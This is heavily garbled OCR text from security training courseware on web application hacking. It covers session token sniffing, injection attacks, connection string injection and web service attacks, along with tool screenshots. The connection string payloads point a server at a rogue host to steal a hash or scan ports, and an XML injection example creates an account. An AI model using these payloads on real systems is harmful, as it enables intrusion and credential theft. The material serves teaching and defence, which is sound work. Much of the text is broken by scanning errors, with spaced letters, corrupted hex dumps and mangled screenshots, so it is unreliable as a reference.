M e c h a n is m : S e s s io n T o k e n
H a n d lin g
S n iffin g
r
JL
c
^ !7
u
■ A tta c k e rs s n iff th e a p p lic a tio n t r a f fic using a s n iffin g t o o l such as W ire s h a rk o r a n in te rc e p tin g p ro x y such as B u rp . If
HTTP c o o k ie s a re bein g used as th e tra n s m is s io n m e c h a n is m f o r session to k e n s a n d th e s e cure fla g is n o t se t, a tta c k e rs
c a n re p la y t h e c o o k ie t o ga in u n a u th o riz e d access t o a p p lic a tio n
A tta c k in g S e s s io n T o k e n s H a n d lin g M e c h a n is m :
S e s s io n T o k e n S n iffin g
W ir e s h a r k
S o u rc e : h tt p : / / w w w . w ir e s h a r k . o r g
W ir e s h a r k is a n e tw o r k p ro to c o l a n a ly z e r. It le ts y o u c a p tu re a n d in te r a c tiv e ly b ro w s e th e tr a f fic
r u n n in g o n a c o m p u te r n e tw o r k . It c a p tu re s liv e n e tw o r k t r a f f ic fr o m E th e rn e t, IEEE 8 0 2 .1 1 ,
P P P /H D LC , A T M , B lu e to o th , USB, T o k e n R in g , F ra m e R e la y , a n d FDDI n e tw o r k s . C a p tu re d file s
can be p ro g r a m m a tic a lly e d ite d via th e c o m m a n d lin e .
st v a a m B (3 <3 . Q . <3 , □
F i lt e r v E x p re s s io n . .. C le a r A p p ly S a ve
N o. T im e S o u rc e D e s tin a tio n P ro to c o l L e n g th I n fo
18 3 .9 8 6 1 6 0 0 0 1 0 .0 .0 .2 7 4 .1 2 5 .2 3 6 .1 6 1 TCP 54 s e r v ic e - c tr l > h ttp s [a c k ] seq=38 A ck=38 w ii
19 5 .1 5 6 3 4 3 0 0 f e 8 0 : : b 9 e a : d O ll : 3 e 0 f f 0 2 : :1 :2 D H C P v6 150 S o lic it X ID : 0 x5 a 8 2 d f C ID : 0001000117e22aab׳
20 5 .6 9 5 6 6 9 0 0 1 0 .0 .0 .2 7 4 .1 2 5 .1 3 5 .1 2 5 TCP 91 [T C P segm ent o f a r e a s s e m b le d PDU]
21 5 .7 5 8 3 2 6 0 0 7 4 .1 2 5 .1 3 5 .1 2 5 1 0 .0 .0 .2 TCP 60 x m p p - c lie n t > qw ave [a c k ] s e q -1 A c k -3 8 w in —
22 5. 9 9 9 6 3 3 0 0 f e 8 0 : : 5 d f8 : C 2 d 8 : 5 b b f f0 2 : : 1 : 2 DHCPV6 150 S o lic it X ID : 0x83e049 C ID : 0 0 0 1 0 0 0 1 1 7 e 8 e l4 e ׳
23 7 .0 4 2 4 7 6 0 0 1 0 .0 .0 . 5 1 2 3 .1 0 8 .4 0 .3 3 TCP 66 w e b m a il- 2 > h ttp [s y n ] seq=0 w in = 8 1 9 2 Len=0
24 7 .0 7 6 3 2 4 0 0 1 2 3 .1 0 8 .4 0 .3 3 1 0 .0 .0 .5 TCP 60 h ttp > w e b m a il- 2 [ s y n , a c k ] seq=0 A c k = l w in ־
25 7 .0 7 6 6 9 1 0 0 1 0 .0 .0 . 5 1 2 3 .1 0 8 .4 0 .3 3 TCP 60 w e b m a il- 2 > h ttp [a c k ] s e q = l A c k = l w in = 6 4 2 4 !
26 7 .0 7 6 9 0 0 0 0 1 0 .0 .0 .5 1 2 3 .1 0 8 .4 0 .3 3 HTTP 1197 GET /n e w m a il/ m a ils ig n o u t . p h p H T T P /1 .1
27 7 .1 3 0 4 2 7 0 0 1 2 3 .1 0 8 .4 0 .3 3 1 0 .0 .0 .5 TCP 60 h ttp > w e b m a il- 2 [a c k ] seq ־l A c k 1 1 4 4 ־ w in = 8:
28 7 .1 3 5 7 3 5 0 0 1 2 3 .1 0 8 .4 0 .3 3 1 0 .0 .0 .5 TCP 1514 [tc p segm ent o f a r e a s s e m b le d p d u ]
29 7 .1 3 6 6 3 5 0 0 1 2 3 .1 0 8 .4 0 . 33 228 H T T P /1 .1 200 OK ( te x t /h t m l)
III
<1 >
<1 HI
II >
0060 3a 32 32 3a 33 34 20 47 4d 54 Od Oa 53 65 72 76 :2 2 :3 4 G M T .. S e rv
0070 65 U 3a 20 41 ׳׳0 b l 63 68 bb Od Oa 53 65 /4 2d e r : Apac h e .. S e t-
0080 43 6 t 6f 6b 69 65 3a 20 5 f 6e 31 38 75 5 f 3d 64 c o o k i e : n l 8u =d -
0090 65 6c 65 74 65 64 3b 20 65 78 70 69 72 65 73 3d e le te d ; e x p ir e s -
O O aO 54 68 7 5 2C 20 32 32 2d 53 65 70 2d 32 30 31 31 T hu , 2 2 - s e p -2 0 11
O O bO 20 31 30 3a 32 32 3a 33 33 20 47 4d 54 3b 20 70 1 0 :2 2 :3 3 GM T; p
O O cO 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 69 a th - /; d o m a in - . ו
O O dO 6e 2e 63 61 6d Od Oa 45 78 70 69 72 65 73 3a 20 n .c o m .. E x p ir e s :
O O eO 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 T hu , 19 N ov 1981
O O fO 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 Od Oa 43 0 8 :5 2 :0 0 G M T . .C
0 10 0 61 63 68 65 2d 43 6f 6e 74 72 6f 6C 3a 20 6e 6f a c h e -c o n t r o l : no
0 110 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 -s to re , n o -c a c h e
0 12 0 2c 20 6 d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 , m u s t-r e v a lid a t
0130 65 2 c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c e , p o s t- che ck= 0 .
0140 20 70 72 65 2d 63 68 65 63 6b 3d 30 Od Oa 50 72 p re -c h e ck= 0. . Pr V
F IG U R E 1 3 .4 9 : W ir e s h a r k T o o l S c re e n s h o t
Attack
Footprint Web Analyze Web Authorization Perform Attack
Infrastructure Applications Schemes Injection Attacks Web App Client
C o p y r ig h t © b y EC-Gauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b A p p H a c k in g M e t h o d o lo g y
נ
InjectionAttacks CEH
Urt1fw4 ilhiul lUthM
th e in te r p r e te d la n g u a g e b e in g u se d in o rd e r to b re a k a p p lic a t io n 's n o rm a l in te n d e d
W e b S c r ip ts I n je c t io n S Q L I n je c t io n
If user in p u t is used in to code th a t is d yn a m ica lly
E n te r a s e r ie s o f m a lic io u s S Q L q u e r ie s
th e d a ta b a s e
th e server
B ם
O S C o m m a n d s I n je c t io n LD A P I n je c t io n
E x p lo it o p e r a tin g s y s te m s b y e n te r in g T a k e a d v a n ta g e o f n o n - v a lid a te d w eb
u t iliz e u s e r in p u t in a s y s t e m - le v e l c o m m a n d filte r s to o b t a in d ir e c t a c c e s s t o d a ta b a s e s
B a
S M T P I n je c t io n X P a th I n je c t io n
In je c t a r b it r a r y S T M P c o m m a n d s in t o E n te r m a lic io u s s tr in g s in in p u t fie ld s in
g e n e r a t e la r g e v o lu m e s o f s p a m e m a il t h a t it in te r fe r e s w ith th e a p p l i c a t i o n 's lo g ic
N o t e : F o r c o m p le t e c o v e r a g e o f S Q L In je c t io n c o n c e p ts an d te c h n iq u e s re fe r to M o d u le 1 4 : S Q L I n je c t io n
C o p y r ig h t © b y EC-Gauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
I
In je c tio n A tta c k s
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b A p p H a c k in g M e t h o d o lo g y
A t t a c k D a t a C o n n e c t iv it y CEH
ץ ־ r~
D a ta b a s e c o n n e c tio n s tr in g s a re u s e d D a ta b a s e c o n n e c tiv ity a tta c k s e x p lo it
e n g in e s d a ta b a s e in s te a d o f a b u s in g
d a ta b a s e q u e r ie s
"D a ta S o u rc e = S e rv e r,P o rt;
0 r r
N etw o rk Library=DBMSSOCN; D a ta C o n n e c tiv ity A tta c k s
I n i t i a l C a ta lo g = D a ta B a se ; 0r r S C o n n e c tio n S t r in g I n je c t io n
U ser ID=Username;
Password=pwd;" 0r r S C o n n e c tio n S t r in g P a ra m e te r
0r r
P o llu t io n (C S P P ) A tta c k s
E x a m p le o f a c o m m o n c o n n e c tio n S C o n n e c tio n P o o l D oS
<s=©
s tr in g u s e d to c o n n e c t to a M ic r o s o f t
S Q L S e rv e r d a ta b a s e
0 T r
o
J ־L
_ y v_
C o p y r ig h t © b y EC-Gauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
" D a ta S o u r c e = S e r v e r , P o r t ; N e tw o r k L ib ra ry = D B M S S O C N ; In itia l C a t a lo g = D a ta B a s e ;
U ser ID = U s e rn a m e ; P a s s w o r d = p w d ;"
C o n n e c tio n S tr in g In j e c t i o n CEH
In a d e le g a te d a u th e n tic a tio n e n v ir o n m e n t, th e a t ta c k e r in je c ts p a ra m e te rs in a
c o n n e c tio n s tr in g b y a p p e n d in g th e m w ith th e s e m ic o lo n ( ;) c h a r a c t e r
is u s e d to b u ild c o n n e c tio n s tr in g s b a s e d o n u s e r in p u t
B e fo re I n je c t io n
A f t e r I n je c t io n
W h e n t h e c o n n e c tio n s tr in g is p o p u la te d , t h e Encryption v a lu e w i ll b e a d d e d t o t h e p r e v io u s ly c o n f ig u r e d s e t
o f p a ra m e te rs
C o p y r ig h t © b y EC-Gauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
C o n n e c tio n S tr in g In je c tio n
■
^ A c o n n e c tio n s trin g in je c tio n a tta c k can o c c u r w h e n d y n a m ic s trin g c o n c a te n a tio n is
u sed to b u ild c o n n e c tio n s trin g s t h a t a re b ase d o n u s e r in p u t. If th e s trin g is n o t v a lid a te d a nd
m a lic io u s t e x t o r c h a ra c te rs n o t e s c a p e d , an a tta c k e r can p o t e n t ia lly access s e n s itiv e d a ta o r
o th e r re s o u rc e s o n th e s e rv e r. F or e x a m p le , an a tta c k e r c o u ld m o u n t an a tta c k b y s u p p ly in g a
s e m ic o lo n a n d a p p e n d in g an a d d itio n a l v a lu e . T h e c o n n e c tio n s trin g is p a rs e d b y u s in g a "la s t
o n e w in s " a lg o r ith m , a nd th e h o s tile in p u t is s u b s titu te d f o r a le g itim a te v a lu e .
B e fo re in je c tio n
F IG U R E 1 3 .5 0 : B e fo re in je c tio n
A f t e r in je c tio n
F IG U R E 1 3 .5 1 : A f te r in je c tio n
C o p y r ig h t © by EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
A tta c k s
H a s h S t e a lin g
D a ta s o u r c e = S Q L 2 0 0 5 ; i n i t i a l c a t a l o g d b l; in t e g r a t e d s e c u r it y = n o ; user
I D = ; D a t a S o u rc e = R o g u e S e r v e r ; P a ssw ord= In te g r a te d S e c u r ity = tr u e ;
P o r t S c a n n in g
ב A tta c k e r tr ie s to c o n n e c t t o d if fe r e n t p o r ts b y c h a n g in g th e v a lu e a n d s e e in g th e e r r o r
m e ssa ge s o b ta in e d .
D a ta s o u r c e = S Q L 2 0 0 5 ; i n i t i a l c a ta lo g = d b l; in t e g r a t e d s e c u r it y = n o ; u s e r
ID = ;D a ta S o u rc e = T a rg e t S e rv e r, T a rg e t P o rt= 4 4 3 ; P a s s w o rd = ; In te g ra te d
S e c u r ity = tr u e ;
H ija c k in g W e b C r e d e n tia ls
D a ta s o u r c e = S Q L 2 0 0 5 ; i n i t i a l c a ta lo g = d b l; in t e g r a t e d s e c u r it y = n o ; user
ID = ;D a ta S o u rc e = T a rg e t S e r v e r , T a r g e t P o r t ; P a s s w o rd = ; I n t e g r a t e d
S e c u r ity = t r u e ;
s im u lta n e o u s ly t o c o n s u m e a ll c o n n e c t io n s in th e c o n n e c tio n p o o l, c a u s in g
d a ta b a s e q u e r ie s to fa il f o r le g it im a t e u s e rs
Example:
B y d e f a u lt in A S P .N E T , t h e m a x im u m a llo w e d c o n n e c tio n s in th e p o o l is &
1 0 0 a n d t i m e o u t is 3 0 s e c o n d s
th a t n o o n e e ls e w o u ld b e a b le to u s e th e d a ta b a s e - r e la te d p a rts o f th e
a p p lic a tio n
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
C o n n e c tio n P o o l D o S
E x a m p le :
Attack
Footprint Web Analyze Web Authorization Perform Attack
Infrastructure Applications Schemes Injection Attacks Web App Client
W e b A p p H a c k in g M e t h o d o lo g y
A t ta c k W e b A p p C lie n t
AttackWebAppClient
J A tta c k e rs in te r a c t w ith th e s e r v e r - s id e a p p lic a tio n s in u n e x p e c te d w a y s in o r d e r to p e r fo r m m a lic io u s
a c t io n s a g a in s t t h e e n d u s e rs a n d a c c e s s u n a u th o r iz e d d a ta
C o p y r ig h t © b y EC-Council. A l l R ig h ts R e s e r v e d R e p r o d u c t i o n i s S t r i c t l y P r o h ib it e d .
A tta c k W e b A p p C lie n t
© HTTP H e a d e r In je c tio n
© F ra m e In je c tio n
© R e q u e s t F o rg e ry A tta c k s
© S ession F ix a tio n
© P riv a c y A tta c k s
© A c tiv e X A tta c k s
R e d ir e c tio n A tta c k s
I) /l
f A tta c k e rs d e v e lo p co d e s a nd lin k s in su ch a w a y t h a t th e y re s e m b le th e m a in s ite t h a t
th e u s e r w a n ts to v is it; h o w e v e r, w h e n a u s e r w a n ts t o v is it th e re s p e c tiv e s ite , th e u s e r
is r e d ir e c te d t o th e m a lic io u s w e b s ite w h e re th e r e is a p o s s ib ility f o r th e a tta c k e r t o o b ta in th e
u s e r's c re d e n tia ls a n d o th e r s e n s itiv e in fo r m a tio n .
t H T T P H e a d e r In je c tio n
F ra m e In je c tio n
£ R e q u e s t F o rg e ry A tta c k
S e s s io n F ix a t io n
P r iv a c y A tta c k s
A A c t iv e X A tta c k s
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b A p p H a c k in g M e t h o d o lo g y
A tta c k W e b S e r v ic e s
AttackWebServices CEH
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
Cl
r jf A tta c k W e b S e r v ic e s
© SOAP In je c tio n
© X M L In je c tio n
© W S D L P ro b in g A tta c k s
© In fo r m a tio n Leakage
© D a ta b a s e A tta c k s
Q DoS A tta c k s
F IG U R E 1 3 .5 2 : A tta c k W e b S e r v ic e s
W eb S e rv ic e s P ro b in g A tta c k s CEH
Urtifwd ilhiul lUtbM
9 These attacks w o rk s im ila r t o SQL in je c tio n attacks « A tta c k e r uses th e se requests t o in clude m alicious
c o n te n ts in SOAP requests and analyzes errors t o gain a
deeper und erstanding o f p o te n tia l s ecurity weaknesses
C o p y r ig h t © b y EG-Gouacil.A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b S e r v ic e s P r o b in g A tta c k s
In th e f ir s t s te p , th e a tta c k e r tr a p s th e W S D L d o c u m e n t fr o m w e b s e rv ic e tr a f fic a nd
a n a lyze s it to d e te r m in e th e p u rp o s e o f th e a p p lic a tio n , fu n c tio n a l b re a k d o w n , e n tr y p o in ts ,
a n d m e ssa g e ty p e s . T h e se a tta c k s w o r k s im ila r ly to SQL in je c tio n a tta c k s . T h e a tta c k e r th e n
c re a te s a s e t o f v a lid re q u e s ts b y s e le c tin g a s e t o f o p e ra tio n s , a n d fo r m u la tin g th e re q u e s t
m e ssa ge s a c c o rd in g to th e ru le s o f th e X M L S ch em a t h a t can be s u b m itte d t o th e w e b s e rv ic e .
T h e a tta c k e r uses th e s e re q u e s ts t o in c lu d e m a lic io u s c o n te n t in SO AP re q u e s ts a n d a n a ly z e s
e rro rs to g a in a d e e p e r u n d e r s ta n d in g o f p o te n tia l s e c u r ity w e a k n e s s e s .
F IG U R E 1 3 .5 3 : W e b S e r v ic e s P r o b in g A tta c k s
J A t ta c k e r in je c ts m a lic io u s q u e ry s tr in g s in t h e u s e r in p u t fie ld to b y p a s s w e b s e r v ic e s
0 d )®
Server Response
O O h ttp : //ju g g y b o y . c o m /w s /p r o d u c ts .a s m x
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b S e r v ic e A tta c k s : S O A P In je c tio n
Server Response
Q © http://iuggyboycom/ws/products.asm x
FIGURE 1 3 .5 4 : SO A P I n je c tio n
X M L d a ta b a s e w ith b o g u s e n tr ie s
D o S a tta c k s
S e rv e r S id e C o d e
http://juggyboy.com/ws/login.asmx
J < u s e r>
■ < u s e m ame > j a s on< / u s e m am e> C re a te s n e w
m ark@ certifiedhacker.com </mail> </user>
■ < p a s s w o rd > a ttc )c < /p a s s w o rd >
<u$er> <username>Jason</usemame> ■ < u s e r id > 1 0 5 < /u s e r id >
o n th e s e rv e r
<password>attack</password> ■ < m a il> ja s o n @ ju g g y b o y • c o n K /m a il>
<userid>105</useridxm ail>jason (Sjuggyboy.com ■ < ^ u s e r>
< /u s e r s >
C o p y r i g h t © b y E C - G a u a c tl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b S e r v ic e A tta c k s : X M L In je c tio n
T h e p ro c e s s in w h ic h th e a tta c k e r e n te rs v a lu e s t h a t q u e ry X M L w ith v a lu e s t h a t ta k e
a d v a n ta g e o f e x p lo its is k n o w n as an X M L in je c tio n a tta c k . A tta c k e r s in je c t X M L d a ta a n d ta gs
in to u s e r in p u t fie ld s to m a n ip u la te X M L s c h e m a o r p o p u la te X M L d a ta b a s e w ith b o g u s e n trie s .
X M L in je c tio n can be used to b yp a ss a u th o r iz a tio n , e s c a la te p riv ile g e s , a n d g e n e ra te w e b
s e rv ic e s DoS a tta c k s .
S e r v e r S id e C o d e
o o http://j1Jggyboy.com/ws/10gin.asmx
< ? x n l v e r s io n ■ 1 . 0 * "׳e n c o d i n g - ' I S O ־8 8 5 9 ־l " ? >
< u s « rs >
Account Login < u s *r>
< u s • r n M M > g a n d a 1 £*< / u s « r n « n • >
< p a s 3 w o rd > ! a 3 < /p a s s w o r d >
U sernam e Mark < u s e r id > 1 0 1 < /u s « r id >
< r ־. a i l > g a n d a l f ■ 'r . i d d l e e a r t h . c o m < / r ־. a i l >
</user>
I
<ua*rna.*n#> ja s o n < /u s « rn a m e >
<pas3word>attck</pa3sword>
•
;
!
C re a te s n e w
W eb S e rv ic e s P a rs in g A tta c k s CEH
p a rs e r to c re a te a d e n ia l- o f - s e r v ic e a tta c k o r g e n e ra te lo g ic a l e r r o r s in w e b s e r v ic e r e q u e s t
p r o c e s s in g
A t t a c k e r q u e r ie s f o r w e b s e r v ic e s w it h a A tta c k e rs s e n d a p a y lo a d t h a t is
g r a m m a t ic a lly c o r r e c t S O A P d o c u m e n t t h a t e x c e s s iv e ly la r g e t o c o n s u m e a ll s y s te m s
c o n t a in s in f in it e p r o c e s s in g lo o p s r e s u lt in g re s o u rc e s r e n d e r in g w e b s e r v ic e s
in e x h a u s tio n o f X M L p a rs e ra n d C P U in a c c e s s ib le t o o t h e r le g itim a te u s e rs
re s o u rc e s
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b S e r v ic e s P a r s in g A tta c k s
R e c u r s iv e P a y lo a d s
O v e r s iz e P a y lo a d s
s o a p U I is a o p e n s o u r c e
f u n c tio n a l te s tin g t o o l, m a in ly
u s e d f o r w e b s e r v ic e t e s tin g
It s u p p o rts m u ltip le p r o to c o ls
s u c h a s SO AP , REST, H TTP, JM S ,
A M F , a n d JD BC
A t ta c k e r c a n u s e th is t o o l t o
c a rry o u t w e b s e r v ic e s p r o b in g ,
S O A P in je c tio n , X M L in je c tio n ,
a n d w e b s e r v ic e s p a r s in g
a tta c k s
C o p y r ig h t © by EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h ib it e d
W e b S e r v ic e A tta c k T o o l: s o a p U I
hdC
< v - d l . p a z s n n i r - * * b u y a srijig " t-ypc—’’x=<i. 3t u i n g ”/ >
© C 3 buy_fadt I
Messaoe 5ize 277
m a
<,■vsdl : n a c B a j o
ino cing : I boirRea
UTF-8
bgirRespJ
<vsdl:2ressaaa na!1e="busRespoase" >
Encboirt http://ww...
Q& 0
bgin_f jlII
■cwsdl.pars naue=־buyrasuls ־elenen^=” tna:PuyRespoase”/^
< / v 9 d l :m e :3 a ;e >
3nc Address * □ part:p <vsdl ־tn“ §5aa® naT¥*="Login_fa־jltM3g">
־oflov ׳Rcdi... true 0
©••CD b g jtR.ec <v=dl:par םnane="loginFault" cype=*xsd:string"/>
Jserane © O booutRes i/w s d l.a e :3 a je >
-,assv'0'd ih C□ b c o jt fa ׳a d l - m i c a ^ • n a n e = " l o g o u t _ f J u ltM « g " >
>xnan © C3 searchRe < v s d l: p a r t r ^ x a = " I o q o J t ia u lt '* typ -3 = "x3 d : s t r i n g V >
Autncntica...
*ftSS^ass...
Global HTT... ►S
pa l;<^1tty://A־ww.cxa11plc.otg/>ertulc/
W55 rmeT...
SSL Keyatore
Slop SOAP ... fake
EnaDle M7CW false
rwteMTOM fol»c
I Hire Rcep... false
txpandM T .. false
bodbe axil... (rue
EnoxScAet... false
FrwrtU ’nln falc# ׳
Proper fc#e
F IG U R E 1 3 .5 6 : s o a p U l T o o l S c re e n s h o t
j A lto v a XMl S p y
: Fic E it Frcject >M- DTDfSchcmo Cchcrno design XSLJXQucry Authentic Convert View Ercwso׳
A lto v a X M L S p y is t h e X M L e d ito r a n d
d e v e lo p m e n t e n v ir o n m e n t fo r
:W
SDL SOAP Tools W
indow Help
a i a . a 12- ׳,a j 1^ ip iia in ig iB ■ !r , W H ff iilF b
m o d e lin g , e d itin g , tr a n s fo r m in g , a n d
; כ. jg 1> ■ ft, [^<s- <y B ! y 00 & -
d e b u g g in g X M L - r e la te d te c h n o lo g ie s
ncyR 3 XSL O u tp u t , h tm t
httpTVivsw'AS orgf20
m/XML£cnerria-1nsta פד
nee־
xslscnenraLocation
h ttp /x m s 3y. neVag e r
c/fschem astoersonn
el
Ksi:fot־eachse1ect="
n1:Firs1Name">
> I I i i I 1I י
span s ty le -'col or: navy:
font-famity:Arial;
A
־P e rs o n n
The
Q 'h * A * n c >«3 © A q e n ts
X Call Stack
| V<lu» / Atlrih N»<n»____ D ccunrnt
tJ ( ) Per v jt aDato Elcniat xsl:rcr-eech TheAgencyR3.xsf Tertiporarr Re$» *
tl () ״lrsNane Oam
ert xsl:fo־־eo=h Thc.AgcncyR3.x5H Temporary Res_ ׳
C o p y r i g h t © b y E C - C a u a c tl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b S e r v ic e A tta c k T o o l: X M L S p y
^ 2 S o u rc e : h t t p : / / w w w . a lt o v a . c o m
IAltova XMLSpy □ (s J S 1
i File Edit Project XML DTD/Schema Schema design XSL/XQuery Authentic C onvert View Browser
ID IH j0 1 # U U jB lliB i I? I r a j f
ם ט ם טט ם
0 1 /X M L S c h e m a - in s ta < /s p a n >
nee"
h ttp :/fx m ls p y . n e t / a g e n
n 1 :F ir s t N a m e " >
The
- Personn
c y /s c h e m a s /p e rs o n n s p a n s ty le = " c o lo r :n a v y ;
el fo n t־fa m ily :A r ia l;
C :V T h e A g e n c y .x s d "> fo n t ־s iz e :1 2 p t;
33
^־־ M o d u le F lo w
^ W e b A p p P en T e s tin g W e b A p p C o n c e p ts
^ S e c u r ity T o o ls W e b A p p T h r e a ts
C o u n te r m e a s u r e s fs=9 H a c k in g M e th o d o lo g y
S b )
•^י־-
S o u rc e : h t t p : / / w w w . p o r t s w ig g e r . n e t
I
10443
s
0 1 ^ ■ ]200 *
1 We סService AitacK 400 193
attack type *nicer 2 we סSeMce *itac* 200 10443
F IG U R E 1 3 .5 8 : B u rp S u ite P r o f e s s io n a l T o o l S c r e e n s h o t
J The to o l re p o rts on th e p re d ic ta b ility and e n tro p y o f th e cookie and w h e th e r critic a l in fo rm a tio n , such as user nam e and
passw ord, are included in th e cookie values
F o u n d s t o n e | C o o k ie D ig g e r
'/* tea URLs
ןi/Vim* .ווק/com 31
accounts gootfe coro/Seracelogn A ih ,' f_soace־״et «tnp v.3A"2.׳F 2 ..־ffrai
m»l.google.conz_,'na»-1t*1c/_/)s./>Mr.lrj11f1*Ai1er»X04lWI$a»St.«n/rv'*1/| ' jd fn
https y/tnal.google oorvmalAvO.Ai •28v1ew*«ptver^hrt4nw»*r4
https://mtti
si google cwn/VnaHi/UAj « 2hin»^apl w nchm > 6 t1 4
(jw d «*■**־p»e
h ttp ://w w w .m c a fe e .c o m
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b A p p lic a tio n H a c k in g T o o l: C o o k ie D ig g e r
S o u rc e : h ttp ://w w w .m c a fe e .c o m
C o o k ie D ig g e r is a to o l th a t d e te c ts v u ln e r a b le c o o k ie g e n e r a tio n and th e in s e c u re
im p le m e n ta tio n o f se ssio n m a n a g e m e n t by w e b a p p lic a tio n s . T his to o l is b a se d o n th e
c o lle c tio n a n d e v a lu a tio n o f c o o k ie s b y a w e b a p p lic a tio n used b y m a n y users.
C e r ta in ty a n d e n tr o p y o f th e c o o k ie a re fa c to rs o n w h ic h th e to o l re lie s . T h e c o o k ie v a lu e s
c o n ta in v a lu a b le in fo r m a tio n su ch as th e lo g in d e ta ils o f th e u s e r (u s e r n a m e a n d p a s s w o rd ).
F o u n d s to n e C o o k ie D ig g e r
File Help
Foundstone | CookieDigger
Visted URLs ;POSTData
/ http//Wwwgmadcom
https://accounts google.com/ServiceLoginAuh f_sourceret״rttp%3A%2F%2fmai n .com
httpsJ/mei googlecom/_/m«l-stabc/_/js/man/m_11/rt41/ver*X061WK£se4k en/*v*1/am«f 2Fnewm«l./
%2Frt>oxphpJJgfrm*<nai!fjd*™matthews4
httpsJ/mM googlecom/mai/u/OAj־24vtew»bsp4ver*ohN4rw8mbn4 f_pwd*sweetp!e
httpsJ/mai googlecom/mail/u/OAji-2&v1ew־bsp4ver־0W4fw8mbn4
httpsJ/mai googlecom/mad/u/OAji=24vtew־bsp4ver«ohH4rw&nbo4
https//maJ googlecom/ma1l/u/Q/'>shva־1
https://maJgooglecom/_/mad■stafcc/_/j3/man/m_iJt/rt4\/ver»X06lWKEse4k en7$v»1/a<n»f
httpsV/mai googlecom/mail/u/0Aj1*24v1ew«bsp4ver»ohN4rw&T1bn4
https://mai googlecom/ma!l/u/0Ajt״24v1ew״bsp4ver*ohH4rw&T1bn4
googlecom/marf/u/0/'>u1-24v>ew-6sp4ver-ohH4rw&nbr14
https//ma<googlecom/mad/u/0Aj!4tml4zy״c
res//!esetupdB/HardMmmKm
http//wwwmcom/loginvenfyphp User ID |jg
http//mailjn com/newmad/ftemdexphp,msgd*4type•
aboutblank Password I* ®
http//hotmaJ/
http//Wwwhotmadcom/
« Back Nod »
F IG U R E 1 3 .5 9 : C o o k ie D ig g e r T o o l S c r e e n s h o t
I t a llo w s th e a tta c k e r to r e v ie w a n d m o d if y re q u e s ts c re a te d b y th e b r o w s e r b e fo re th e y a re s e n t to th e s e rv e r,
a n d to r e v ie w a n d m o d if y re s p o n s e s re tu rn e d fr o m th e s e rv e r b e fo re th e y a re r e c e iv e d b y th e b ro w s e r
F ile V ie w Io o ls H e lp
S u m m a ry M e s s a g e lo g P ro x y M anual R equest W e b S e r v ic e s S p id e r E x t e n s io n s S e s s io n ID A n a ly s is S c r ip t e d F r a g m e n ts C o m p a re
2 S u m m a ry
□ T r e e S e le c tio n n i t e r s c o n v e r s a t io n l i s t
U rl M e th o d s S ta tu s | S e t- C o o k ie C o m m e n ts S c n p ts
? (1 5 h ttp ://w w w .o w a s p .o ra :8 0 / GET 30 1 M o v e d .. □ □ □
° ־n b a n n e rs / □ □ □
o- n im a a e s / □ □ □
9 (1 3 in d e x p h p / □ □ □
O M a ln _ P a g e GET 200 OK □ E
o- □ s k in s / □ □ □
H ost P a th S ta tu s O r ig in
' ׳U U b/U b O T U t I h ttp /M v w w o w a s p o rg BU /s k in s / m o n o b o o k / m a in '•׳/־ 2DUO K
http:fA 1v w w .o w a s p .o rg 80 /s k in s / c o m m o n / IE F ix e s P ro x y
h ttp ://w w w .o w a s p .o r g .8 0 /s k in s / c o m m o n / c o m m o P ro x y
2 0 0 6 /0 6 /2 3 GET h t tp ://w w w .o w a s p o rg 8 0 /in d e x p h p /M a m _ P a g e P ro x y
2 0 0 6 /0 6 /2 3 ... G E T h t tp : //w w w . o w a s p .o r g .8 0 l/ P ro x y
h ttp ://w w w .o w a s p .o rg
C o p y r i g h t © b y E C - G a u a c tl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b A p p lic a tio n H a c k in g T o o l: W e b S c a r a b
S o u rc e : h t tp ://w w w .o w a s p .o r g
i W e b S c a ra b
X
F ile V ie w Io o ls H e lp
E l S u m m a ry a 1
*
□ T r e e S e le c tio n f i l t e r s c o n v e r s a t io n lis t
U rl M e th o d s S t a tu s S e t- C o o k le C o m m e n ts S c r ip ts J
? h t tp : / / w w w . o w a s p . o r g : 8 0 / GET 3 0 1 M o v e d ... □ □ □
° 3 ] ־b a n n e rs / □ □ □
o- C 3 im a g e s / □ □ □
? In d e x p h p / □ □ □
Q M a in _ P a g e GET 200 O K □ •׳ 0
o- s k in s / □ □ □
